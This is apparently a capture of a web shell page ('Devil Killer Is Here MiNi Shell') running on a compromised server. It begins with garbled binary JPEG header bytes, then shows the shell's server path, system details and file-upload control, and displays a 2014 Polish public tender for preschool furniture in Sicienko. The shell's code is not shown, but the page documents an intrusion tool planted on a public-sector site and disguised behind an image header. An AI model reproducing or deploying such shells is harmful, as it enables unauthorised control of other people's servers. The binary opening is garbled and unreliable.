JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/219833-N-2014.html

<p class="kh_header"><b>Sicienko: zakup ,dostawa, montaż mebli i wyposażenia sal i szatni oraz zakup wyposażenia wypoczynkowego   do oddziałów przedszkolnych w szkołach podstawowych na terenie gminy Sicienko.</b><br>
<b>Numer ogłoszenia: 219833 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sicienko , ul. Mrotecka 9, 86-014 Sicienko, woj. kujawsko-pomorskie, tel. 052 55 41 223, 0-52 58 70 755, faks 052 5870407.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.sicienko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zakup ,dostawa, montaż mebli i wyposażenia sal i szatni oraz zakup wyposażenia wypoczynkowego   do oddziałów przedszkolnych w szkołach podstawowych na terenie gminy Sicienko..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup ,dostawa, montaż sprzętu do utrzymania czystości w pomieszczeniach oraz zakup i montaż wyposażenia kuchennego dla oddziałów przedszkolnych w szkołach podstawowych na terenie gminy Sicienko. 
1.	Meble i wyposażenie - zakup i montaż:
Podane poniżej wymiary mebli mają charakter orientacyjny. Dopuszcza się odstępstwa od wymiarów poszczególnych elementów w zakresie +-5cm. 
1)	Zestaw mebli przedszkolnych - zestaw składający się z 11 różnych szaf i szafek, z których można stworzyć jednolity zestaw lub podzielić na kilka mniejszych; wykonany z płyty laminowanej min. 18mm, obrzeża z PCV 2 mm, korpusy i obrzeża w kolorze buk, fronty kolorowe (co najmniej 2 kolory wkomponowane w zestaw spośród: niebieski, czerwony, zielony, żółty, pomarańczowy, fioletowy); uchwyty jednolite: kulki drewniane lub odpowiednie wycięcia / żłobienia umożliwiające otwarcie  -  11 zestawów.
Skład zestawu: 
Wymiary w kolejności: wysokość / szerokość / głębokość. 
a)	szafka z 4 szufladami na całej szerokości, wymiary 80x80x39cm; szuflady kolorowe;
b)	regał z półkami odkrytymi u góry i dwoma szufladami na dole - wymiary 152x80x39cm, min. 4 odkryte półki (5 przestrzeni) oraz 2 szuflady z kolorowymi frontami;
c)	regał z półkami odkrytymi u góry i czterema drzwiczkami na dole - wymiary 162x90x39cm, regał podzielony na 8 części - na górze 2 półki odkryte podzielone na pół płytą (razem tworzą 4 półki), na dole szafka z czterema drzwiczkami (fronty kolorowe); góra zakończona płasko lub ozdobnie;
d)	regał z półkami po jednej stronie, z drzwiczkami po drugiej stronie - wymiary 90x90x39cm, szafka z dwiema lub trzema półkami po jednej stronie - front szafki kolorowy; po drugiej stronie 1 lub 2 półki; góra zakończona płasko lub ozdobnie;
e)	regał z półkami u góry i dwoma drzwiczkami na dole - wymiary 162x90x39cm, na górze 2 półki odkryte podzielone na pół płytą (razem tworzą 4 półki), na dole szafka z dwoma drzwiczkami (fronty kolorowe), w szafce co najmniej 1 półka; góra zakończona płasko lub ozdobnie;
f)	 regał dwudrzwiowy - wymiary 90x90x39cm, szafka z dwoma drzwiczkami (fronty kolorowe), w środku co najmniej 1 półka; góra zakończona płasko lub ozdobnie;
g)	regał z szufladami po jednej stronie, z pojedynczymi drzwiczkami po drugiej stronie - wymiary 90x90x39cm, szafka z 4 szufladami po jednej stronie i szafką  z 1 drzwiczkami po drugiej stronie, w szafce min. 1 półka, fronty szuflad i drzwiczek: kolorowe; góra zakończona płasko lub ozdobnie;
h)	szafa skrytkowa z drzwiczkami na klucz - wymiary 190x80x40cm, szafa składa się z 10 równych schowków zamykanych na klucz (zamki patentowe w komplecie; kolor: buk, drzwi w kolorze buk lub buk z jednym z kolorów wymienionych w punkcie 1);
i)	regał z plastikowymi pojemnikami na zabawki - wymiary 90x90x39cm, pojemniki plastikowe różnej wielkości (min. 5 szt.) wysuwane na prowadnicach; pojemniki kolorowe; góra zakończona płasko lub ozdobnie;
j)	regał z półkami z jednej strony i plastikowymi takiej samej wielkości pojemnikami na zabawki z drugiej strony - wymiary 90x90x39cm; z jednej strony półki (co najmniej 1 w połowie wysokości szafki), z drugiej plastikowe pojemniki - min. 5 szt. na prowadnicach; pojemniki jednokolorowe np. czerwone, wszystkie jednakowej wielkości; góra zakończona płasko lub ozdobnie;
k)	regał z 10 szufladami - wymiary 110x90x39 cm, 5 szuflad po każdej stronie; fronty szuflad kolorowe; góra zakończona płasko lub ozdobnie;
2)	Biurko dla nauczyciela - wymiary 160x60x76cm z płyty laminowanej 18mm z trwałym obrzeżem PCV 2mm, z 4 szufladami po jednej stronie, z szafką i otwartą półką po drugiej stronie oraz z półką klawiatury, kolor: buk - 11 szt.
3)	Krzesło dla nauczyciela - krzesło obrotowe z regulacją kąta pochylenia i wysokości oparcia, na podnośniku gazowym, profilowane siedzisko i oparcie ze specjalnej, trwałej pianki PUR - 11 szt;
4)	Stoliki przedszkolne prostokątne - o wymiarach 120x70cm (wys. nr 2 i nr 3), z blatem z płyty laminowanej 18mm w kolorze buk, z mocnym półokrągłym obrzeżem - profilem T. Stelaż metalowy złożony z ramy i 4 stabilnych nóg o średnicy min. 50 mm zaopatrzonych w regulatory wysokości. Blat mocowany do stelaża w sposób trwały i estetyczny za pomocą śrub i mufek (nie wkrętów); stelaż i profil T kolorowy: żółty - 22 szt, z tego 12 szt. o wysokości nr 2, 10 szt. o wysokości nr 3;
5)	Stoliki przedszkolne sześciokątne - o przekątnej 120cm (wys. nr 2 i nr 3), z blatem z płyty laminowanej 18mm z mocnym półokrągłym obrzeżem - profilem T. Stelaż metalowy złożony z ramy i 6 stabilnych nóg o średnicy min. 50 mm zaopatrzonych w regulatory wysokości. Blat mocowany do stelaża w sposób trwały i estetyczny za pomocą śrub i mufek (nie wkrętów); stelaż i profil T w kolorze żółtym - razem 16 szt, z tego 8 szt. o wysokości nr 2 oraz 8 sztuk o wysokości nr 3;
6)	Krzesełka przedszkolne - krzesła na metalowym stelażu z profilu 20x20 o stałej wysokości (nr 2 i nr 3),kolor stelażu: żółty, siedzisko i oparcie z profilowanej i lakierowanej sklejki - kolor: buk - szt. 130, w tym 49 o wysokości nr 2 i 81 o wysokości nr 3; 
7)	Tablica suchościeralna - tablica szkolna, suchościeralna, biała, z magnetycznej blachy tablicowej w listwach bocznych z profilu aluminiowego, łączonego na rogach estetycznymi półkolami z tworzywa sztucznego, w komplecie półka na pisaki i zestaw montażowy; wymiary 170x100cm - 9 szt; 
8)	Tablica trzyczęściowa biała gładka: w ramie z aluminium, tablica centralna o wym. 170 x 100 cm, dwie tablice dwustronne o wym. 85 x 100 cm, w komplecie półeczka na gąbkę i markery, powierzchnia lakierowana - 2 szt.;
9)	Tablica korkowa: w ramie z aluminium, wymiary: 90x150 cm - 5 szt., 
10)	Tablica korkowa: w ramie z aluminium, wymiary: 100x200 cm - 12 szt.
11)	Dywan: wymiary 3x4m; tkany maszynowo, kolorowy motyw bajkowy lub zwierzęcy, co najmniej 2 różne wzory - 3 szt.;
12)	Dywan: wymiary 4x5m, tkany maszynowo, kolorowy motyw bajkowy lub zwierzęcy, co najmniej 2 różne wzory - 10 szt.;
13)	Regał z czterema półkami - regał o wymiarach 190x80x40cm (wys/szer/gł), 
z płyty laminowanej 18mm i trwałego obrzeża PCV 2mm, 4 półki, (5 przestrzeni segregatorowych) na płycinowym cokole lub na imbusowych stopkach, kolor: buk - szt. 4;
14)	Szafa dwudrzwiowa z czterema półkami - szafa o wymiarach 190x80x40cm (wys/szer/gł), z płyty laminowanej 18mm i trwałego obrzeża PCV 2mm, 4 półki (5 przestrzeni segregatorowych) na płycinowym cokole lub na imbusowych stopkach, kolor: buk - szt. 4,
15)	Stolik piankowy - okrągły puf piankowy pokryty tkaniną PCW, może służyć jako siedzisko lub stolik wymiary: średnica 30-45cm, wysokość 25-45cm, - szt. 6.

2.	Wyposażenie - zakup i montaż:
1)	Wykładzina obiektowa heterogeniczna - wykładzina co najmniej trójkolorowa (mozaika), antypoślizgowa, powierzchnia podłogi 49,84 m.kw. (560x890cm), powierzchnia cokołów 2,90 m.kw. Przed montażem wykładziny należy: zdemontować i usunąć posadzkę z tworzyw sztucznych 49,84 m.kw., przygotować stare podłoże pod docieplenie metodą lekką - mokrą poprzez gruntowanie emulsją gruntującą, wykonać warstwy wyrównujące i wygładzające z zaprawy samopoziomującej grub. 5 mm, dodatek lub potrącenie na zmianę grubości o 1 mm warstwy wyrównującej i wygładzającej z zaprawy samopoziomującej, zamontować nową wykładzinę PCV; cokoły z wywinięciem na ścianę na wys. 10cm, uprzątnąć i wywieźć zdemontowaną posadzkę i gruz - 1 szt;

3.	Wyposażenie wypoczynkowe - zakup:
1)	Łóżeczko przedszkolne - łóżeczko o wymiarach: długość 130-140cm, szerokość: 55-60 cm; konstrukcja stalowa (obrzeża); powierzchnia do spania z tkaniny przepuszczającej powietrze, narożniki łóżeczka wykonane z tworzywa sztucznego - ich konstrukcja powinna umożliwiać układanie łóżeczek jedno na drugim - szt. 62,
2)	Pościel dziecięca - poduszka i kołderka z atestowanym wypełnieniem z możliwością prania w pralce, powłoczka na poduszkę, kołderka lub kocyk, prześcieradło z gumką; materiał: bawełna 100%, powłoczki kolorowe z motywami bajkowymi, wymiary prześcieradła i pościeli dostosowane do wielkości łóżeczka opisanego w pkt. 1 - 50 kompletów;
3)	Poduszki okrągłe - poduszki do siedzenia (siedziska), wykonane z tkaniny PCV; wypełnione gąbką, różnokolorowe; średnica 30-35 cm, wysokość 3-5cm  - 110 szt (mogą być komplety),
4)	Poduszki kwadratowe - poduszki do siedzenia (siedziska) o wymiarach minimalnych: dł/szer. 30 cm, wysokość 5 cm, obszyte tkaniną PCV, różnokolorowe - 80 szt. (mogą być komplety);
5)	Poduszki sensoryczne w kształcie zwierzątek - miękkie siedziska wypełnione granulatem, pokryte zmywalną tkaniną PCV, wysokość ok. 60 cm, różnokolorowe z elementami sensorycznymi np. nosek, uszy, łapki - 25 szt.
6)	Pufa z motywem zwierzęcym - pufa wypełniona pianką, pokryta bawełnianym pokrowcem, który można prać lub tkanina PCV, wysokość ok. 30 cm, kolorystyka i dodatkowe elementy np. uszy imitują zwierzątka np. zebrę, żabę, małpę itp.; oferta winna zawierać min. 3 różne zwierzątka - 28 szt.
7)	Siedzisko z granulatem - miękka, wygodna poducha wypełniona granulatem, dopasowująca się kształtem do osoby siedzącej, pokryta tkanina PCV, wymiary: średnica ok. 80 cm, wysokość ok. 60 cm, różne kolory - 22 szt.
8)	Kanapa dziecięca trzymiejscowa - wymiary ok. 137 x 57 x 56 cm (+-10 cm), miękka, wygodna, z oparciem, minimum dwukolorowa - szt. 11;
9)	Materac trzyczęściowy - wykonany z twardej pianki poliuretanowej pokrytej zmywalnym materiałem np. tkaniną PCV, długość: 180 - 200 cm, szerokość: 90-115cm, grubość: 5 cm- 13 szt.
10)	Materac narożny w kształcie serca - kolorowy materac narożny z naszytymi aplikacjami kolorowych serc, służący zarówno do wypoczynku, jak i zabawy; pokrycie bawełniane, wym. 150 x 150 x 15 cm - 1 szt.

4.	Meble do wyposażenia szatni - zakup i montaż:
1)	Szafki na ubrania - zestaw szatniowy 6-osobowy, wykonany z płyty wiórowej laminowanej, kolor: buk (jedyny kolor lub wiodący), na górze półki np. na czapki, na dole na obuwie z ławką/półką do siedzenia, pod górnymi półkami metalowe wieszaki, wymiary: szer. 130-155 cm, gł. 40-50 cm, wys. 130-141cm - 28 kompletów,
2)	Wieszak szatniowy jednostronny - wykonany z konstrukcji stalowej/metalowej, siedzisko i oparcie z lakierowanych desek np. sosnowych lub z płyty laminowanej, na górze 6 haczyków na ubrania (pojedyncze lub podwójne) - 10 szt.,
3)	Wieszak szatniowy dwustronny - wykonany z konstrukcji stalowej/metalowej, siedzisko i oparcie z lakierowanych desek np. sosnowych lub z płyty laminowanej, na górze 6 haczyków na ubrania po każdej stronie (pojedyncze lub podwójne) - 2 szt.,
4)	Szafa ubraniowa dwudrzwiowa - wykonana z płyty laminowanej o gr. min. 18mm, wyposażona w półkę górną oraz drążek na wieszaki ubraniowe, kolor: buk; wymiary 185-205x76-90x53-60 (wys/szer/gł) - 2 szt.,
5)	Szafa ubraniowa jednodrzwiowa - wykonana z płyty laminowanej o gr. min. 18 mm, wyposażona w półkę górną oraz drążek na wieszaki ubraniowe, kolor: buk; wymiary 180-186 x 50-60 x 58-80 (wys/szer/gł) - 1 szt.,
6)	Szafa aktowa dwudrzwiowa - wykonana z płyty laminowanej, wymiary: 180-182-186 x 76-80 x 38-40 cm; 5 przestrzeni segregatorowych, kolor buk, zamek i klucze w zestawie - 1 szt,
7)	Regał z półkami - regał otwarty wykonany z płyty laminowanej o gr. min. 18mm, wymiary, wewnątrz 2 półki (3 przestrzenie segregatorowe) - 1 szt. 

Meble i wyposażenie winny spełniać warunki bezpieczeństwa i higieny w publicznych 
i niepublicznych szkołach i placówkach . 

Miejsca i warunki dostawy:
Ww. meble i wyposażenie należy dostarczyć, zamontować zgodnie z wykazem do następujących szkół, po wcześniejszym ustaleniu dokładnego terminu i godziny z koordynatorem projektu:
1.	Zespół Szkół w Sicienku -ul. Sportowa 2, 86-014 Sicienko (godz. 11:00 - 18:00)
2.	Zespół Szkół w Wojnowie, Wojnowo 18 (budynek oddziałów przedszkolnych) oraz Wojnowo 1 (budynek szkoły), 86-014 Sicienko (godz. 11:00 - 18:00)
3.	Szkoła Podstawowa w Kruszynie, Kruszyn, ul. Szkolna 6, 86-014 Sicienko (godz. 11:00 - 18:00)
4.	Szkoła Podstawowa w Samsiecznie, Samsieczno 34a, 86-014 Sicienko (godz. 11:00 - 18:00)
5.	Szkoła Podstawowa w Strzelewie, Strzelewo 1, 86-014 Sicienko (godz. 11:00 - 18:00)
6.	Szkoła Podstawowa w Trzemiętowie, Trzemiętowo 2, 86-014 Sicienko (godz. 11:00 - 18:00).

W celu właściwego przygotowania oferty, szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 5 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 44.11.22.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferent zapewni, jako część swojej oferty wadium w wysokości 1.500,- zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ma szczególnych wymagań dla uznania , że wykonawca spełnia warunek uprawnień do wykonywania określonej działalności. Dla uznania, że wykonawca spełnia powyższy warunek zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z załącznikiem nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek zamawiający wymaga by wykazał, iż wykonał  w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie dostawy, z podaniem ich  wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy lub usługi zostały wykonane lub są wykonywane należycie - zgodnie z załącznikiem 3 do SIWZ. Zamawiający żąda aby wykonawca wykazał zrealizowaną lub realizowaną przynajmniej jedną  dostawę o wartości co  najmniej 150.000 zł z asortymentem zbliżonym do przedmiotu zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z załącznikiem 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia zamawiający wymaga, złożenia oświadczenia o spełnianiu warunków z art.22.ust.1 PZP - zgodnie z załącznikiem 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek sytuacji ekonomicznej i finansowej, zamawiający wymaga, by wykonawca załączył do oferty aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
oraz aktualne zaświadczenie właściwego naczelnika urzędu skarbowego  - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - dokumenty określone w § 6 pkt.II ppkt.5 i 6 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

